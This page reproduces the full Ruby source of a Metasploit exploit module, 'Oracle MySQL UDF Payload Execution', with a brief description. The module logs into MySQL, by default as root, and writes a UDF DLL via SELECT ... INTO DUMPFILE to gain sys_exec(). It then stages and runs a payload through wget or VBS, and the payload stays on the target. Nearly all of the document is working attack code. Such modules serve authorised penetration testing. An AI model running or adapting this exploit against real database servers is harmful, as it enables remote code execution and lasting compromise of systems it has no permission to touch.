Oracle MySQL UDF Payload Execution

This Metasploit module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL versions 5.5.9 and below, directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This Metasploit module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.


MD5 | bcf3d2156b2ec4dfa9eb9e73784fb039

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle MySQL UDF Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.

NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb', # this Metasploit module
'h00die' # linux addition
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
],
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
[ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
))
register_options(
[
OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
])
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def login_and_get_sys_exec
m = mysql_login(username,password,'mysql')
return if not m
@mysql_arch = mysql_get_arch
@mysql_sys_exec_available = mysql_check_for_sys_exec()
if [email protected]_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
mysql_add_sys_exec
@mysql_sys_exec_available = mysql_check_for_sys_exec()
else
print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
end

return m
end

def execute_command(cmd, opts)
mysql_sys_exec(cmd, datastore['VERBOSE'])
end

def exploit
m = login_and_get_sys_exec()

if not m
return
elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
return
else
if @mysql_sys_exec_available
execute_cmdstager({:linemax => 1500, :nodelete => true})
handler
else
print_status("MySQL function sys_exec() not available")
return
end
end
disconnect
end
end

Related Posts